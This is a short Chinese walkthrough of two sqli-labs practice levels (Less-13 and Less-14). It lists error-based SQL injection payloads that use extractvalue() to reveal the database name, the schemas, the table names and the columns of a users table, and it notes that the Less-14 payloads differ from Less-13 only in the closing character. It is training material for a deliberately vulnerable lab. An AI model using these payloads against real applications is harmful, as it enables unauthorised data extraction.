我们先来看看源SQL语句
发现使用 ') 闭合的
查看数据库名:') and extractvalue(1,concat('%',database())) --+
可以看出数据库名为“security”
查看所有数据库:') and extractvalue(1,concat('%',(select group_concat(schema_name) from information_schema.schemata))) --+
查看数据库中所有表:') and extractvalue(1,concat('%',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+
查看user表中所有字段:') and extractvalue(1,concat('%',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) --+
完成
Less-14 POST - Double Injection - Single quotes- String -twist
查询源SQL语句发现是用 " 闭合的
查看数据库名:" and extractvalue(1,concat('%',database())) --+
与Less-13相同 把 ') 改为 " 即可,再此不过多赘述。